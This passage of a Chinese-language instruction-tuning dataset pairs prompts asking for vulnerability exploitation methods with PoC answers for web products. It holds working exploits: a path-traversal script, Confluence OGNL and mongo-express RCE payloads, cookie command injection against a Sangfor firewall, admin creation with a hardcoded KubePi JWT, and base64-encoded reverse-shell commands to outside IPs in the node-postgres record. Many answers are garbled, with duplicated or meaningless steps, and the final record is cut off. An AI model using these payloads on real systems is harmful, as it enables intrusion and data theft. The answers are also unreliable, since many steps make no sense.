  806. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Citrix XenMobile 任意文件读取 CVE-2020-8209\n漏洞描述:XenMobile是Citrix开发的企业移动性管理软件。该产品允许企业管理员工的移动设备和移动应用程序。该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。 CVE-2020-8209,路径遍历漏洞。此漏洞允许未经授权的用户读取任意文件,包括包含密码的配置文件\n影响版本:``` RP2之前的XenMobile服务器10.12 RP4之前的XenMobile服务器10.11 RP6之前的XenMobile服务器10.1010.9 RP5之前的XenMobile服务器 ```\n网络测绘:``` title=\"XenMobile\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-8209\n【POC利用方法】\n1. RP2之前的XenMobile服务器10.12\nRP4之前的XenMobile服务器10.11\nRP6之前的XenMobile服务器10.1010.9\nRP5之前的XenMobile服务器\n2. title=\"XenMobile\"\n3. #!/usr/bin/python3\n#-*- coding:utf-8 -*-\n# author : PeiQi\n# from   : http://wiki.peiqi.tech\n\nimport hashlib\nimport sys\nimport requests\nimport random\nimport re\nimport urllib3\n\ndef title():\n    print('+------------------------------------------')\n    print('+  \\033[34mVersion: Citrix XenMobile                                          \\033[0m')\n    print('+  \\033[36m使用格式: python3 CVE-2020-8209.py                                  \\033[0m')\n    print('+  \\033[36mUrl    >>> http://xxx.xxx.xxx.xxx                                 \\033[0m')\n    print('+------------------------------------------')\n\ndef POC_1(target_url):\n    vuln_url = target_url + \"/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd\"\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\"\n    }\n    try:\n        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=10)\n        print(\"\\033[32m[o] 含有CVE-2020-8209漏洞,成功读取/etc/passwd\\033[0m\\n{} \".format(response.text))\n    except:\n        print(\"\\033[31m[x] 漏洞利用失败 \\033[0m\")\n\n\n\nif __name__ == '__main__':\n    title()\n    target_url = str(input(\"\\033[35mPlease input Attack Url\\nUrl >\t\t>> \\033[0m\"))\n    POC_1(target_url)\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Citrix XenMobile 任意文件读取 CVE-2020-8209.md"}
    807. 

  807. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:阿尔法科技 虚拟仿真实验室 未授权访问漏洞\n漏洞描述:阿尔法科技 虚拟仿真实验室 存在未授权访问漏洞,通过访问构造的Url可以获取敏感信息\n影响版本:``` 虚拟仿真实验室 ```\n网络测绘:``` body=\"河南阿尔法科技有限公司\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. body=\"河南阿尔法科技有限公司\"\n2. /admin/student/studentlist.html?page=1\n3. http://www.0dayhack.net/index.php/1702/\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/阿尔法科技 虚拟仿真实验室 未授权访问漏洞.md"}
    808. 

  808. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:MinIO 集群模式信息泄露漏洞 CVE-2023-28432\n漏洞描述:MinIO是一个开源对象存储系统。 在其`RELEASE.2023-03-20T20-16-18Z`版本(不含)以前,集群模式部署下存在一处信息泄露漏洞,攻击者可以通过发送一个POST数据包获取进程所有的环境变量,其中就包含账号密码`MINIO_ROOT_USER`和`MINIO_ROOT_PASSWORD`。 参考链接: - https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q - https://mp.weixin.qq.com/s/GNhQLuzD8up3VcBRIinmgQ\n影响版本:``` MinIO <= RELEASE.2023-03-20T20-16-18Z ```\n网络测绘:``` app=\"minio\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2023-28432\n【POC利用方法】\n1. MinIO <= RELEASE.2023-03-20T20-16-18Z\n2. app=\"minio\"\n3. docker-compose up -d\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/MinIO 集群模式信息泄露漏洞 CVE-2023-28432.md"}
    809. 

  809. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:魅课 OM视频会议系统 proxy.php 文件包含漏洞\n漏洞描述:魅课OM视频会议系统 proxy.php文件target参数存在本地文件包含漏洞。攻击者可借助该漏洞无需登录便可下载任意文件。\n影响版本:``` 魅课OM视频会议系统 ```\n网络测绘:``` app=\"OMEETING-OM视频会议\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"OMEETING-OM视频会议\"\n2. /admin/do/proxy.php?method=get&target=../../../../../../../../../../windows/win.ini\n3. /admin/do/proxy.php?method=get&target=../../../../../../../../../../windows/win.ini\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/魅课 OM视频会议系统 proxy.php 文件包含漏洞.md"}
    810. 

  810. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:EduSoho 教培系统 app_dev.php 任意读取漏洞\n漏洞描述:EduSoho 教培系统是由杭州阔知网络科技研发的开源网校系统。 通过向 /app_dev.php/_profiler/open 端点发送可以读取到 app/config/parameters.yml 文件的内容,拿到该文件中保存的 secret 值以及数据库账号密码等敏感信息。\n影响版本:EduSoho 教培系统\n网络测绘:``` \"Powered By EduSoho\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. \"Powered By EduSoho\"\n2. GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1\nHost:  \nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n3. Accept: */*\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/EduSoho 教培系统 app_dev.php 任意读取漏洞.md"}
    811. 

  811. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:七牛云 logkit log_path 任意文件读取漏洞\n漏洞描述:七牛云 logkit log_path 参数可自定义读取服务器文件,配合读取的文件写入Web目录将会使攻击者读取到服务器任意文件,造成服务器敏感信息泄漏\n影响版本:``` 七牛云 logkit V1.4.1 ```\n网络测绘:``` title=\"七牛Logkit配置文件助手\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 七牛云 logkit V1.4.1\n2. title=\"七牛Logkit配置文件助手\"\n3. PUT /logkit/configs/passwdread HTTP/1.1\nHost: \nAccept: */*\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nContent-Length: 356\nContent-Type: application/json\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36\n\n{\n  \"name\": \"passwdread\",\n  \"batch_interval\": 1,\n  \"collect_interval\": 1,\n  \"reader\": {\n    \"mode\": \"file\",\n    \"log_path\": \"/etc/passwd\",\n    \"read_from\": \"oldest\",\n    \"datasource_tag\": \"datasource\",\n    \"encoding\": \"UTF-8\"\n  },\n  \"parser\": {\n    \"type\": \"raw\",\n    \"name\": \"parser\",\n    \"timestamp\": \"true\"\n  },\n  \"transforms\": [],\n  \"senders\": [\n    {\n      \"sender_type\": \"file\",\n      \"file_send_path\": \"/app/public/passwd.log\"\n    }\n  ]\n}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/七牛云 logkit log_path 任意文件读取漏洞.md"}
    812. 

  812. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:深信服 NGAF下一代防火墙 login.cgi 远程命令执行漏洞\n漏洞描述:深信服下一代防火墙是一款以应用安全需求出发而设计的下一代应用防火墙。深信服下一代防火墙在 login.cgi 路径下,PHPSESSID 处存在命令执行漏洞。攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。\n影响版本:深信服 NGAF下一代防火墙\n网络测绘:``` \"Redirect.php?url=LogInOut.php\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. \"Redirect.php?url=LogInOut.php\"\n2. POST /cgi-bin/login.cgi HTTP/1.1 \nHost: \nCache-Control: max-age=0 \nContent-Type: Application/X-www-Form\ny-forwarded-for: 127.0.0.1\nCookie: PHPSESSID=`$(id > /fwlib/sys/virus/webui/svpn_html/3.txt)`;\n\n{\"opr\":\"login\", \"data\":{\"user\": \"watchTowr\" , \"pwd\": \"watchTowr\" , \"vericode\": \"NSLB\" , \"privacy_enable\": \"0\"}}\n3. /svpn_html/3.txt\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/深信服 NGAF下一代防火墙 login.cgi 远程命令执行漏洞.md"}
    813. 

  813. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:安美数字 酒店宽带运营系统 server_ping.php 远程命令执行漏洞\n影响版本:``` 安美数字 酒店宽带运营系统 ```\n网络测绘:``` \"酒店宽带运营\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 安美数字 酒店宽带运营系统\n2. <?\nif (!isset($ip) || $ip == \"\" || !isset($id) || $id == \"\") exit;\n\n$cmd = \"ping -c 2 -s 65 $ip\";\n$fp = popen($cmd, \"r\");\n$getString = \"\";\nif ($fp) {\n\twhile (($line = fgets($fp, 512))) {\n\t\t$getString .= trim($line);\n\t}\n\tpclose($fp);\n\t\n}\n\nif (strstr($getString, \"2 received, 0%\")) {\n\techo \"<html><body><script language=\\\"javascript\\\">\\n\";\n\techo \"parent.doTestResult('$id', 'ok');\\n\";\n\techo \"</script></body></html>\\n\";\n} else {\n\techo \"<html><body><script language=\\\"javascript\\\">\\n\";\n\techo \"parent.doTestResult('$id', 'no');\\n\";\n\techo \"</script></body></html>\\n\";\n}\n?>\n3. $cmd = \"ping -c 2 -s 65 $ip\";\n$fp = popen($cmd, \"r\");\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/安美数字 酒店宽带运营系统 server_ping.php 远程命令执行漏洞.md"}
    814. 

  814. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:网御星云 web防护系统 信息泄露漏洞\n漏洞描述:网御星云 web防护系统 存在信息泄露漏洞,通过访问特殊的Url获取部分敏感信息\n影响版本:``` 网御星云 ```\n网络测绘:``` title=\"网页防篡改系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. title=\"网页防篡改系统\"\n2. http://xxx.xxx.xxx.xxx/API/\n3. http://xxx.xxx.xxx.xxx/API/\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/网御星云 web防护系统 信息泄露漏洞.md"}
    815. 

  815. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:汉得SRM tomcat.jsp 登陆绕过漏洞\n漏洞描述:汉得SRM tomcat.jsp 文件存在登陆绕过漏洞, 攻击者通过发送请求包,可以获取后台管理员权限\n影响版本:汉得SRM\n网络测绘:``` web.body=\"汉得SRM\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. web.body=\"汉得SRM\"\n2. /tomcat.jsp?dataName=role_id&dataValue=1\n/tomcat.jsp?dataName=user_id&dataValue=1\n3. /main.screen\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/汉得SRM tomcat.jsp 登陆绕过漏洞.md"}
    816. 

  816. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Atlassian Confluence doenterpagevariables.action 远程命令执行漏洞 CVE-2021-26084\n漏洞描述:Atlassian Confluence 存在远程代码执行漏洞,攻击者在无需认证,即可构造恶意请求,造成OGNL表达式注入,从而执行任意代码,控制服务器。\n影响版本:``` Atlassian Atlassian Confluence < 7.4.11 Atlassian Atlassian Confluence < 7.11.6 Atlassian Atlassian Confluence < 7.13.0 Atlassian Atlassian Confluence < 6.13.23 Atlassian Atlassian Confluence < 7.12.5 ```\n网络测绘:``` app=\"ATLASSIAN-Confluence\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-26084\n【POC利用方法】\n1. Atlassian Atlassian Confluence < 7.4.11\nAtlassian Atlassian Confluence < 7.11.6\nAtlassian Atlassian Confluence < 7.13.0\nAtlassian Atlassian Confluence < 6.13.23\nAtlassian Atlassian Confluence < 7.12.5\n2. app=\"ATLASSIAN-Confluence\"\n3. ![1](C:/Users/47236/Desktop/1.png)POST /pages/doenterpagevariables.action HTTP/1.1\nHost: \nConnection: keep-alive\nContent-Length: 599\nCache-Control: max-age=0\nsec-ch-ua: \"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"92\"\nsec-ch-ua-mobile: ?0\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nAccept-Encoding: gzip, deflate, br\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nCookie: JSESSIONID=3E654B6F4ADDF325CA2203596BD0115C\ncmd: id\n    \nqueryString=%5Cu0027%2B%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName%28%5Cu0022javax.script.ScriptEngineManager%5Cu0022%29.newInstance%28%29.getEngineByName%28%5Cu0022js%5Cu0022%29.eval%28%5Cu0022var+c%3Dcom.atlassian.core.filters.ServletContextThreadLocal.getRequest%28%29.getHeader%28%5Cu0027cmd%5Cu0027%29%3Bvar+x%3Djava.lang.Runtime.getRuntime%28%29.exec%28c%29%3Bvar+out%3Dcom.atlassian.core.filters.ServletContextThreadLocal.getResponse%28%29.getOutputStream%28%29%3Borg.apache.commons.io.IOUtils.copy%28x.getInputStream%28%29%2Cout%29%3Bout.flush%28%29%3B%5Cu0022%29%7D%2B%5Cu0027\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Atlassian Confluence doenterpagevariables.action 远程命令执行漏洞 CVE-2021-26084.md"}
    817. 

  817. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:mongo-express 远程代码执行漏洞 CVE-2019-10758\n漏洞描述:mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(`admin:pass`),则可以执行任意node.js代码。\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2019-10758\n【POC利用方法】\n1. docker-compose up -d\n2. POST /checkValid HTTP/1.1\nHost: your-ip\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\nAuthorization: Basic YWRtaW46cGFzcw==\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 124\n\ndocument=this.constructor.constructor(\"return process\")().mainModule.require(\"child_process\").execSync(\"touch /tmp/success\")\n3. POST /checkValid HTTP/1.1\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/mongo-express 远程代码执行漏洞 CVE-2019-10758.md"}
    818. 

  818. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jupyter Notebook 未授权访问远程命令执行漏洞\n漏洞描述:Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。 如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。\n影响版本:``` Jupyter Notebook ```\n网络测绘:``` app=\"Jupyter-Notebook\" && body=\"Terminal\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. Jupyter Notebook\n2. app=\"Jupyter-Notebook\" && body=\"Terminal\"\n3. docker-compose up -d\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Jupyter Notebook 未授权访问远程命令执行漏洞.md"}
    819. 

  819. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:中科网威 NPFW防火墙 CommandsPolling.php 任意文件读取漏洞\n漏洞描述:中科网威 NPFW防火墙 存在任意文件读取漏洞,由于代码过滤不足,可读取服务器任意文件\n影响版本:``` 中科网威 NPFW防火墙 ```\n网络测绘:``` \"中科网威\" && \"/direct\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 中科网威 NPFW防火墙\n2. \"中科网威\" && \"/direct\"\n3. POST /direct/polling/CommandsPolling.php HTTP/1.1\nHost: \nCookie: PHPSESSID=014d2705856e1df139772db42ccbaf9f\nContent-Length: 47\nCache-Control: max-age=0\nSec-Ch-Ua: \"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"92\"\nSec-Ch-Ua-Mobile: ?0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\ncommand=ping&filename=%2Fetc%2Fpasswd&cmdParam=\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/中科网威 NPFW防火墙 CommandsPolling.php 任意文件读取漏洞.md"}
    820. 

  820. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Atlassian Confluence OGNL表达式注入命令执行漏洞 CVE-2022-26134\n漏洞描述:Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新,通告了一个严重且已在野利用的代码执行漏洞,攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令。 参考链接: - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html - https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis\n影响版本:``` Atlassian Confluence 7.4.17 Atlassian Confluence 7.13.7 Atlassian Confluence 7.14.3 Atlassian Confluence 7.15.2 Atlassian Confluence 7.16.4 Atlassian Confluence 7.17.4 Atlassian Confluence 7.18.1 ```\n网络测绘:``` app=\"ATLASSIAN-Confluence\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2022-26134\n【POC利用方法】\n1. Atlassian Confluence 7.4.17\nAtlassian Confluence 7.13.7\nAtlassian Confluence 7.14.3\nAtlassian Confluence 7.15.2\nAtlassian Confluence 7.16.4\nAtlassian Confluence 7.17.4\nAtlassian Confluence 7.18.1\n2. app=\"ATLASSIAN-Confluence\"\n3. docker-compose up -d\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Atlassian Confluence OGNL表达式注入命令执行漏洞 CVE-2022-26134.md"}
    821. 

  821. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:极通EWEBS casmain.xgi 任意文件读取漏洞\n漏洞描述:极通EWEBS casmain.xgi 任意文件读取漏洞,攻击者通过漏洞可以读取任意文件\n影响版本:``` 极通EWEBS ```\n网络测绘:``` app=\"新软科技-极通EWEBS\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"新软科技-极通EWEBS\"\n2. POST /casmain.xgi HTTP/1.1\nHost: \nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nCookie: PHPSESSID=923b86fa90ce1e14c82d4e36d1adc528; CookieLanguageName=ZH-CN\nContent-Length: 57\n\nLanguage_S=../../../../windows/system32/drivers/etc/hosts\n3. Language_S=../../Data/CONFIG/CasDbCnn.dat\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/极通EWEBS casmain.xgi 任意文件读取漏洞.md"}
    822. 

  822. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:TerraMaster TOS 信息泄漏漏洞 CVE-2022-24990\n漏洞描述:TerraMaster TOS 存在信息泄漏漏洞,攻击者通过漏洞可以获取服务器上的敏感信息,配合 CVE-2022-24989漏洞可以获取服务器权限\n影响版本:``` TerraMaster TOS < 4.2.31 ```\n网络测绘:``` \"TerraMaster\" && header=\"TOS\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2022-24990\n【POC利用方法】\n1. TerraMaster TOS < 4.2.31\n2. \"TerraMaster\" && header=\"TOS\"\n3. # 例如下列的Url调用那么$class将是 class,并且$function 是 func。\n/module/api.php?class/func\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/TerraMaster TOS 信息泄漏漏洞 CVE-2022-24990.md"}
    823. 

  823. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:node-postgres 代码执行漏洞 CVE-2017-16082\n漏洞描述:node-postgres在处理类型为`Row Description`的postgres返回包时,将字段名拼接到代码中。由于没有进行合理转义,导致一个特殊构造的字段名可逃逸出代码单引号限制,造成代码执行漏洞。 参考链接: - https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html - https://node-postgres.com/announcements#2017-08-12-code-execution-vulnerability - https://zhuanlan.zhihu.com/p/28575189\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2017-16082\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. python sqlmap.py -u http://your-ip:3000/?id=1 --dbs\n3. SELECT 1 AS \"\\']=0;require=process.mainModule.constructor._load;/*\", 2 AS \"*/p=require(`child_process`);/*\", 3 AS \"*/p.exec(`echo YmFzaCAtaSA+JiAvZGV2L3R`+/*\", 4 AS \"*/`jcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYxCgo= |base64 -d|bash`)//\"\n\nSELECT 1 AS \"\\']=0;require=process.mainModule.constructor._load;/*\", 2 AS \"*/p=require(`child_process`);/*\", 3 AS \"*/p.exec(`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvd`+/*\", 4 AS \"*/`GNwLzEwMS40Mi4yMzcuNjEvMjMzMyAwPiYx |base64 -d|bash`)//\"\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/node-postgres 代码执行漏洞 CVE-2017-16082.md"}
    824. 

  824. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:金盘 微信管理平台 getsysteminfo 未授权访问漏洞\n漏洞描述:金盘 微信管理平台 getsysteminfo接口存在未授权访问漏洞,攻击者通过漏洞可以获取账号密码信息,获取后台管理员权限\n影响版本:金盘 微信管理平台\n网络测绘:``` title=\"微信管理后台\" && icon_hash=\"116323821\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. title=\"微信管理后台\" && icon_hash=\"116323821\"\n2. /admin/weichatcfg/getsysteminfo\n3. /admin/weichatcfg/getsysteminfo\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/金盘 微信管理平台 getsysteminfo 未授权访问漏洞.md"}
    825. 

  825. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:GitLab 任意文件读取导致RCE CVE-2020-10977\n漏洞描述:GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的web服务。GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git仓库管理工具,且具有wiki和issue跟踪功能。 参考链接: - [Hackone-Arbitrary file read via the UploadsRewriter when moving and issue](https://hackerone.com/reports/827052) - [CVE-2020-10977-Gitlab CE/EE 任意文件读取导致远程命令执行漏洞](https://juejin.cn/post/6916343939649765389)\n影响版本:``` GitLab GitLab EE >=8.5,<=12.9 GitLab GitLab CE >=8.5,<=12.9 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-10977\n【POC利用方法】\n1. GitLab GitLab EE >=8.5,<=12.9\nGitLab GitLab CE >=8.5,<=12.9\n2. yum -y install policycoreutils openssh-server openssh-clients postfix\n3. yum -y install ./gitlab......12_8.1.rpm\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/GitLab 任意文件读取导致RCE CVE-2020-10977.md"}
    826. 

  826. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Adobe ColdFusion 远程代码执行漏洞 CVE-2021-21087\n漏洞描述:Adobe ColdFusion是一个快速应用程序开发平台。Adobe ColdFusion 存在远程代码执行漏洞,由于过滤不严,未经授权的攻击者可构造恶意请求,造成任意代码执行,控制服务器。建议相关用户尽快采取安全措施阻止漏洞攻击。 参考链接: - https://nosec.org/home/detail/4707.html - https://github.com/projectdiscovery/nuclei-templates/pull/1128/files - https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html\n影响版本:``` Adobe ColdFusion 2021 <= Version 2021.0.0.323925 Adobe ColdFusion 2018 <= Update 10 Adobe ColdFusion 2016 <= Update 16 ```\n网络测绘:``` app=\"Adobe-ColdFusion\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-21087\n【POC利用方法】\n1. Adobe ColdFusion 2021 <= Version 2021.0.0.323925\nAdobe ColdFusion 2018 <= Update 10\nAdobe ColdFusion 2016 <= Update 16\n2. app=\"Adobe-ColdFusion\"\n3. - method: GET\n    path:\n      - \"{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js\"\n      - \"{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js\"\n      - \"{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js\"\n      - \"{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js\"\n      - \"{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js\"\n      - \"{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js\"\n      - \"{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js\"\n\nregex:\n          - 'eval\\(\\\"\\(\\\"\\+json\\+\\\"\\)\\\"\\)'\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Adobe ColdFusion 远程代码执行漏洞 CVE-2021-21087.md"}
    827. 

  827. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:KubePi JwtSigKey 登陆绕过漏洞 CVE-2023-22463\n漏洞描述:KubePi 是一个现代化的 K8s 面板。KubePi 允许管理员导入多个 Kubernetes 集群,并且通过权限控制,将不同 cluster、namespace 的权限分配给指定用户。它允许开发人员管理 Kubernetes 集群中运行的应用程序并对其进行故障排查,供开发人员更好地处理 Kubernetes 集群中的复杂性。 KubePi 中存在 JWT硬编码,攻击者通过硬编码可以获取服务器后台管理权限,添加任意用户。\n影响版本:KubePi\n网络测绘:``` \"kubepi\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2023-22463\n【POC利用方法】\n1. POST /kubepi/api/v1/users HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.127 Safari/537.36\naccept: application/json\nAccept-Encoding: gzip, deflate\nAuthorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfX0.XxQmyfq_7jyeYvrjqsOZ4BB4GoSkfLO2NvbKCEQjld8\n\n{\n  \"authenticate\": {\n       \"password\": \"{{randstr}}\"\n  },\n  \"email\": \"{{randstr}}@qq.com\",\n  \"isAdmin\": true,\n  \"mfa\": {\n          \"enable\": false\n   },\n  \"name\": \"{{randstr}}\",\n  \"nickName\": \"{{randstr}}\",\n  \"roles\": [\n       \"Supper User\"\n  ]\n}\n2. POST /kubepi/api/v1/users HTTP/1.1\n3. Host: {{Hostname}}\n", "category": 